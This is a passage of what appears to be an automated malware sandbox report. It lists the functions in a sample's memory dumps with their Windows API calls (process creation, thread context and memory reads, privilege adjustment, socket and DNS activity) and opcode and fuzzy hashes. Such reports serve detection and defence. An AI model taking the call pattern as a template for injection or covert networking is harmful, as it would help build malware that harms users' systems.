              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: 2DA1EF30E11209EFDF14DFE4C995BADBBB1EF08315F20846AE911BA2A0D3759A51DF14
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 023A1BDE: GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 023A1BFF
              • CreateFileW.KERNELBASE(000000FF,80000000,00000007,00000000,00000003,00000080,00000000,00000000,000000FF,7F896FF1,000000FF,D6EB2188,000000FF,433A3842,000000FF,A5F15738), ref: 023A1B25
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction ID: f41b2adcd939090a22c15f200a5d9c48461f1e43c7671c6cfb6657c3f1a5feb8
              • Opcode Fuzzy Hash: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction Fuzzy Hash: FF410230D51209FEEF21AFA4CC15FAEBAB6EF04312F1045B4EA55B91A0E7714A11EF10
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 023A05BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 023A05E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 023A0605
              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 023A091F
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadTerminateThread
              • String ID:
              • API String ID: 3842210937-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: 2e64375eeb85010495cf810d5eb959b69fdc572989f38ecec494a473ad45b332
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: 87520B35E50258AEEB64CBA4EC65BFDB7B5FF48710F10449AE608EA2A0D3715E80DF05
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 023A1BFF
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction ID: 1cee014986bf3723a90fb986fdd1c0731d7683ce6c687f28dda338011720ee4c
              • Opcode Fuzzy Hash: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction Fuzzy Hash: 96F03075C0020CFFDF14EFA4C8186ADBB70EB00315F1046B5E86467290D7314AA1DF44
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 023A128F
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: c9da6ca98c486262c14bb2bfc809566c62788ae307f2f5cdfc6c7504ec1cf4a2
              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: 0DD05EB1C5030CBFCB14EFE0CC46C5EBF7DDB01301F1081AAAC0067100DA759B109A94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Executed Functions

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: >_uq
              • API String ID: 0-588969242
              • Opcode ID: c1241226495842b78570bffd1241834c8c302d22774753f47b125ad23f6d5aa3
              • Instruction ID: ff9d82a6d2d8ef8a38563c45138d7a88a8f6cfb194eef34af29ad81fe3e345ea
              • Opcode Fuzzy Hash: c1241226495842b78570bffd1241834c8c302d22774753f47b125ad23f6d5aa3
              • Instruction Fuzzy Hash: EE52B172B04216CFCB14CF58C8849AABBB2FF45310B1589AAD9199F316D771EC46CF90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • bind.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D289B
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: bind
              • String ID:
              • API String ID: 1187836755-0
              • Opcode ID: 9b043665f843de9eb16701f3a2ffc43cf8db6213402563699e835387e6d3dc4e
              • Instruction ID: 1058ee67366ad67c5a320a85cd662f0edc56954d5b26f7514fdab78d53d356b2
              • Opcode Fuzzy Hash: 9b043665f843de9eb16701f3a2ffc43cf8db6213402563699e835387e6d3dc4e
              • Instruction Fuzzy Hash: B7316DB150D3C06FD7138B258C54B96BFB8AF07220F0984EBE984DF1A3D2649849C772
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 057D1333
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: AdjustPrivilegesToken
              • String ID:
              • API String ID: 2874748243-0
              • Opcode ID: 1695e5f3480e53e27ca6d3b2a47afc4337cf6500a2dd15d340342d0bd6aa62da
              • Instruction ID: 94be48f1f4bcccf6b256fa134ef2b00077a6a389b4525ba741369364b4976e78
              • Opcode Fuzzy Hash: 1695e5f3480e53e27ca6d3b2a47afc4337cf6500a2dd15d340342d0bd6aa62da
              • Instruction Fuzzy Hash: 9B21BF76509384AFDB228F25DC40B52BFB4EF06210F0984AAED858F563D270A808DB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WSARecv.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2D66
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Recv
              • String ID:
              • API String ID: 4192927123-0
              • Opcode ID: 906528eb327bde502bfd0f3923e7a050f3b959bb4b969687f0545244b6411f74
              • Instruction ID: 3f320696647cbb460131a1edcaff5297c9e0997b5b2ab6f348bf702a3df68ec0
              • Opcode Fuzzy Hash: 906528eb327bde502bfd0f3923e7a050f3b959bb4b969687f0545244b6411f74
              • Instruction Fuzzy Hash: A011A272500304AFEB22CF55DD44FA6FBA8EF04320F04886AE9459B656D634E405CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 057D1565
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: InformationQuerySystem
              • String ID:
              • API String ID: 3562636166-0
              • Opcode ID: f5bfc5389e16474268e4d69a3be834b01b55100c0e0d7dba4ee391da573d4b3d
              • Instruction ID: 7c4c4483b4ef4dbfdc71a8bf6dad822ab9abf1b6f716c96b1b1ccbe5fba5a2e2
              • Opcode Fuzzy Hash: f5bfc5389e16474268e4d69a3be834b01b55100c0e0d7dba4ee391da573d4b3d
              • Instruction Fuzzy Hash: 2321A1714097C09FDB238B21DC41A51FFB4EF16314F0980DBE9854B563D2659509DB72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • bind.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D289B
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: bind
              • String ID:
              • API String ID: 1187836755-0
              • Opcode ID: ae9228e1cb6529a7fcafabdfaa095db5c11326f18a1384fbf2fcc4b6e5816108
              • Instruction ID: d30edfa014c5e0b751e90660d036b7833f13ef0c891af5669de21f1381eff5b9
              • Opcode Fuzzy Hash: ae9228e1cb6529a7fcafabdfaa095db5c11326f18a1384fbf2fcc4b6e5816108
              • Instruction Fuzzy Hash: 8111C1B6500304AFE721CF55DC84FA6FBACEF04320F18846AED499B646D674E449CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 057D1333
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: AdjustPrivilegesToken
              • String ID:
              • API String ID: 2874748243-0
              • Opcode ID: 7f3068d041241cff6f729971c9460744776bb3d81d0b562ed83989b495f1ed5c
              • Instruction ID: 6519649c81fe4434557cc26cc6c0418f86320598eb2da3f9c2945622f9d0a1fb
              • Opcode Fuzzy Hash: 7f3068d041241cff6f729971c9460744776bb3d81d0b562ed83989b495f1ed5c
              • Instruction Fuzzy Hash: D3115A76A003049FDB20CF59D884B66FBE5EF04320F0884AAED868BA56D375E458DB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetSystemInfo.KERNELBASE(?), ref: 057D1044
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: InfoSystem
              • String ID:
              • API String ID: 31276548-0
              • Opcode ID: ea8c22caddb3621a1391854253e8651bf26bafaa400e9da185d9e1664dcb302a
              • Instruction ID: 2b9f1b8d6430a31b3bbc172d46bc18c53dd9d2296fcb775c8eb7befd4dce925c
              • Opcode Fuzzy Hash: ea8c22caddb3621a1391854253e8651bf26bafaa400e9da185d9e1664dcb302a
              • Instruction Fuzzy Hash: 7C01AD71904384DFDB20DF5AD884766FBA4EF04320F48C4AADD898F646D279A404CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 057D1565
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: InformationQuerySystem
              • String ID:
              • API String ID: 3562636166-0
              • Opcode ID: ca0d6ef4c9688af2af0bd745b81ff47ec73047718e96c7f30f0b754038d15d07
              • Instruction ID: ffb462b04e5db83a63badf55bf6089986d245945caf7225ff0c08c3e73cddaf4
              • Opcode Fuzzy Hash: ca0d6ef4c9688af2af0bd745b81ff47ec73047718e96c7f30f0b754038d15d07
              • Instruction Fuzzy Hash: 810178359007409FDB208F4AD884B61FBA1EF08320F08C49ADD8A0BA56D279A418DFB2
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 56f1315380d95b41459a0c1dc546b5e119094c2775560e33175aafc4e39d252a
              • Instruction ID: bdb31b4ca69491ba918178af31c4817235daf9cad7d1ac58f5dc6a1fe1eb9bf9
              • Opcode Fuzzy Hash: 56f1315380d95b41459a0c1dc546b5e119094c2775560e33175aafc4e39d252a
              • Instruction Fuzzy Hash: B5821475A006059FCB14CF69C484AAEFBB2FF88310F158669D85AAB765D730ED81CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ca7bf2c1a84be93db7ff8a8801312bdba0319d027126faebe871537b7073cedd
              • Instruction ID: ce0851c38420f8fad7962e10eab1b0b90747794de9a2142efd1b269a184f6ac2
              • Opcode Fuzzy Hash: ca7bf2c1a84be93db7ff8a8801312bdba0319d027126faebe871537b7073cedd
              • Instruction Fuzzy Hash: 3B12783AA04225CFDB24CF39C4A46ADBBF3FB89304F14816AD4169B259DB749C86CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 458394130ac318db0ef480e024e4806a793bf20eab616865da11a85f092f0e3c
              • Instruction ID: e90cdbd9fce23e698b2aca3ba07a018023c728b1cae7d9da269a2102b268a921
              • Opcode Fuzzy Hash: 458394130ac318db0ef480e024e4806a793bf20eab616865da11a85f092f0e3c
              • Instruction Fuzzy Hash: D8129C32E14215CFEB28DF69C48866DBBF2BF89300F258569E416AB651DB78DC42CF40
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 057D019D
              • FindCloseChangeNotification.KERNELBASE(?), ref: 057D0264
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ChangeCloseCreateFindMutexNotification
              • String ID:
              • API String ID: 2967213129-0
              • Opcode ID: 18e75fe9ddd1e36507fc25d19b6983223a6d31d0fae1fec5fe66ea376b7e8e68
              • Instruction ID: 348d2de8e13cf7862690a3ea491fdabd9021ff777fba4fd6330bef0d8e8faf6e
              • Opcode Fuzzy Hash: 18e75fe9ddd1e36507fc25d19b6983223a6d31d0fae1fec5fe66ea376b7e8e68
              • Instruction Fuzzy Hash: 0231C5719053809FD711CF15ED49BA6FFA4EF02320F0884ABDC848F652E235A904CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: $>_uq
              • API String ID: 0-2154891095
              • Opcode ID: d244619a5aa0d51b55e9171a70cbb82c84dcf487dd873ba4357255c24f2e0cdd
              • Instruction ID: 80e59b38e0c1114adb9e29ee2b445123db1fbb844524d9f865c3b3e7dc75eedb
              • Opcode Fuzzy Hash: d244619a5aa0d51b55e9171a70cbb82c84dcf487dd873ba4357255c24f2e0cdd
              • Instruction Fuzzy Hash: B141B13AF842558FCB10DF69C8505BEB7B3BBC0215B25846AC415DBA06C635DC83CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: $>_uq
              • API String ID: 0-2154891095
              • Opcode ID: 0892757ae6c0fb2b09a1ffbfcb5ac350485df76d4b725848d102389762185159
              • Instruction ID: 74089900ae8eee11f2293e96006454f73b5c6d81b262592b133214e5bcca3afa
              • Opcode Fuzzy Hash: 0892757ae6c0fb2b09a1ffbfcb5ac350485df76d4b725848d102389762185159
              • Instruction Fuzzy Hash: 2641AF36F041058BDB10DB69CC889AEBBB3ABC1354B35886AD4159BA05C632DD43CF91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 057D0DAB
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 9dd230546426323cf3b43f6f1afd8d37138c6a9613ffaa80e8bc8307486343e0
              • Instruction ID: 5cf5c53872d258edcf0b721141c297f15f8acd7d226349a90bd0bea0c634bd2d
              • Opcode Fuzzy Hash: 9dd230546426323cf3b43f6f1afd8d37138c6a9613ffaa80e8bc8307486343e0
              • Instruction Fuzzy Hash: 5F3195715043446FEB228F65DC44F67BFACEF05320F0488AAE985DB152D264E515CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetTempFileNameW.KERNELBASE(?,00000E2C,?,?), ref: 057D0B6A
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileNameTemp
              • String ID:
              • API String ID: 745986568-0
              • Opcode ID: 0e966b279fb5a3b9b2501b52a2a0d41834b20373caaf1fc0e898a9f0afb5c6e4
              • Instruction ID: 8cf77886b5b6094307588d5d408c330f17375d38079f7e4c6a3df86e61bd1a03
              • Opcode Fuzzy Hash: 0e966b279fb5a3b9b2501b52a2a0d41834b20373caaf1fc0e898a9f0afb5c6e4
              • Instruction Fuzzy Hash: BF315A6140E3C06FD7139B258C61B62BFB4EF47624F0A81DBD8849F5A3D6246919C7B2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 057D045E
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: d104873faecbb6440a887d5a9202a6798047e76442ab7018ba1f0e7bc56e38f9
              • Instruction ID: aeef2675533f8c478248053311b4bdec22036c988935cae37459ac9f78d19d78
              • Opcode Fuzzy Hash: d104873faecbb6440a887d5a9202a6798047e76442ab7018ba1f0e7bc56e38f9
              • Instruction Fuzzy Hash: 8631D5B2004344AFE7228F11CC45FA6FFB8EF06314F04899EE9858B192D3B5A949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 057D0899
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 63ec8bd641568f72a8de4838ac2620eb2b393c43cf306c56dfec7f2caa02e616
              • Instruction ID: ce55ad4c725b1a3458645f1966792867fda4af8d96df0a47c6f0c00e6208b645
              • Opcode Fuzzy Hash: 63ec8bd641568f72a8de4838ac2620eb2b393c43cf306c56dfec7f2caa02e616
              • Instruction Fuzzy Hash: F4316AB1505380AFE722CB25DC44F66FFE8EF05210F0884AAE9858B252D265E809DB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 014BAAB1
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 130fc48deea2c00c4386c08709f428202d5a58707b1a587a9de362615f6a266c
              • Instruction ID: 07401c090e3364ce40a567663f8059b0e283c207a41d6332d9919f4fa78c7c5a
              • Opcode Fuzzy Hash: 130fc48deea2c00c4386c08709f428202d5a58707b1a587a9de362615f6a266c
              • Instruction Fuzzy Hash: E931A2B25443846FE7228B25CC85FA7BFACEF05310F0884AAED819B152D264E949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetExitCodeProcess.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0EAC
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CodeExitProcess
              • String ID:
              • API String ID: 3861947596-0
              • Opcode ID: 09c033fd42b51609963e813cdc1b7183a4520d0b7cc33b3130cbb576b6b473d3
              • Instruction ID: bcf7a27efd9d3b62c81a3da649a23e498efa54bb9501967ee4703f628506e057
              • Opcode Fuzzy Hash: 09c033fd42b51609963e813cdc1b7183a4520d0b7cc33b3130cbb576b6b473d3
              • Instruction Fuzzy Hash: 5331B471509384AFEB12CB25DC55FA6BFA8EF46710F0984DAE9848F1A3D224A908C771
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 057D019D
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: b5eb5411712874d27c53ffa6252327aed668a60b184d51fb1b2e0cd1bfc7ba47
              • Instruction ID: ea01519c38043ba7a1a71bba125a191b6e543298de7c1b381fef70ab9349999e
              • Opcode Fuzzy Hash: b5eb5411712874d27c53ffa6252327aed668a60b184d51fb1b2e0cd1bfc7ba47
              • Instruction Fuzzy Hash: 8B3161B1509780AFE722CB25DC85B56FFF8EF06210F08849AE9858B292D375E909C761
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 014BABB4
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 1e5b2a9c028deaae63cebd4f1440e04a8395feb33519ed97b13dd171a0d0e524
              • Instruction ID: 4471e22c877608a36201f3c444ef6eaea0ad48e13fed7957b53dee62e89a6d74
              • Opcode Fuzzy Hash: 1e5b2a9c028deaae63cebd4f1440e04a8395feb33519ed97b13dd171a0d0e524
              • Instruction Fuzzy Hash: F23195715093846FE722CF25CC84F93BFA8EF06310F18889AE9858B253D264E549CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileView
              • String ID:
              • API String ID: 3314676101-0
              • Opcode ID: 7d2a38c14531f9d11c1af2ebb7020708d9813498f0174455b3ad3e97030c5716
              • Instruction ID: fd65f1f14a982844af90e7d89c90a0e5e088c655940ef158faea85c90cb08708
              • Opcode Fuzzy Hash: 7d2a38c14531f9d11c1af2ebb7020708d9813498f0174455b3ad3e97030c5716
              • Instruction Fuzzy Hash: E03191B2405780AFE722CB55DC45F96FFF8EF06320F08859AE9848B153D365A549CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • setsockopt.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2A79
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: setsockopt
              • String ID:
              • API String ID: 3981526788-0
              • Opcode ID: 9d2a417f0729ce6ee594dffdf7b022c324f01bc823d371de291563eb9e80df9a
              • Instruction ID: 8a78f00c65bf1696788d7f36d553eb0b3d08b237d47bfe59131e8da68347a70c
              • Opcode Fuzzy Hash: 9d2a417f0729ce6ee594dffdf7b022c324f01bc823d371de291563eb9e80df9a
              • Instruction Fuzzy Hash: 67317F71509384AFD722CF25DC54F96FFB8EF46310F0884DAE9849B153D225A949CB72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 014BAFEA
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 04f1ca9a2edde0d34b0079a26095a44fadc71cf2d46503ad2621afa1e0a30d4e
              • Instruction ID: bdf07baec2f484e31d6053ee5061bcef7f6f830b07ab2d179cbec083eb297825
              • Opcode Fuzzy Hash: 04f1ca9a2edde0d34b0079a26095a44fadc71cf2d46503ad2621afa1e0a30d4e
              • Instruction Fuzzy Hash: 6F31717140E7C06FD3138B258C61B61BFB4EF47610F0A41DBD884CB5A3D128A919C762
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D055C
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 26ae4f8bb91378739f1cea26d5e58b8bb5a36ed998fb2a4233a7aaaa7b50df3d
              • Instruction ID: 0f793e59f06523411d539b5c1349e543fbf91c4d1939a89547b584d481fc8ad5
              • Opcode Fuzzy Hash: 26ae4f8bb91378739f1cea26d5e58b8bb5a36ed998fb2a4233a7aaaa7b50df3d
              • Instruction Fuzzy Hash: 7D317F71509780AFD722CB25DC44F92FFB8AF06310F0885DAE9869B1A3D264E808DB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetProcessTimes.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D260D
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ProcessTimes
              • String ID:
              • API String ID: 1995159646-0
              • Opcode ID: 12b992a1007c0d7f400988a72e2e46e26f090b4d027f3543ee533bbfc0c0f255
              • Instruction ID: 1d4406b0c7c3863c6887f319b812007be3a3e323d4789d29dad3bc9433bf2d7f
              • Opcode Fuzzy Hash: 12b992a1007c0d7f400988a72e2e46e26f090b4d027f3543ee533bbfc0c0f255
              • Instruction Fuzzy Hash: 8F21A6711093846FD7228F25DC44F66FFB8EF06310F0884ABE985DB153C265A445CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 014BA1C2
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Startup
              • String ID:
              • API String ID: 724789610-0
              • Opcode ID: aea6f239fc450508a58de7cd05bf069d43497421e0b27db810e58bf0dacb27dc
              • Instruction ID: 133145347cdbd46fc14ea6b05dccaa8769f7399bbbeba7ec8c899d1e03f4b643
              • Opcode Fuzzy Hash: aea6f239fc450508a58de7cd05bf069d43497421e0b27db810e58bf0dacb27dc
              • Instruction Fuzzy Hash: 23219F7140D3C06FD7128B758C51BA6BFB4EF47620F1981DBD9C48F193D225A91ACBA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 057D0DAB
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: f9081a62e82f67ec334f745c21d1c566cead37b6f2e1a552aea26a2fe2d9a06a
              • Instruction ID: 4c00e5d4952313886efc330113327ee0c7136468b917765552705f8b39893522
              • Opcode Fuzzy Hash: f9081a62e82f67ec334f745c21d1c566cead37b6f2e1a552aea26a2fe2d9a06a
              • Instruction Fuzzy Hash: AE21C472500304AFEB21CF65DC44F6AFBACEF04320F04886AED859B555D274E5158B71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WSASend.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2C72
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Send
              • String ID:
              • API String ID: 121738739-0
              • Opcode ID: 657538e0312f99a9188b72ee9b957515e80a28496d790d9c33d05f25fe256374
              • Instruction ID: daf439b22cce20f2cf41a9a4213ca3cf82ed7004b19e7567dc5aeb2e5892ed8f
              • Opcode Fuzzy Hash: 657538e0312f99a9188b72ee9b957515e80a28496d790d9c33d05f25fe256374
              • Instruction Fuzzy Hash: C62195B2404344AFEB228F65DD44FA7BFBCEF45310F0489AAE9859B152D234E505CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 057D2E6A
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FormatMessage
              • String ID:
              • API String ID: 1306739567-0
              • Opcode ID: ff835b274504ee46a44c0220ac25ed96d0a9c59217056b2f9431425515f73b82
              • Instruction ID: 830b31c9d3c09433a0db4930c45fb4b7e2815152e1e8325237203356ac134e03
              • Opcode Fuzzy Hash: ff835b274504ee46a44c0220ac25ed96d0a9c59217056b2f9431425515f73b82
              • Instruction Fuzzy Hash: 0721A17290D3C46FD7129B658C51B66BFB4EF47610F0980DBD8848F2A3D224A919CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DnsQuery_A.DNSAPI(?,00000E2C,?,?), ref: 057D1896
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Query_
              • String ID:
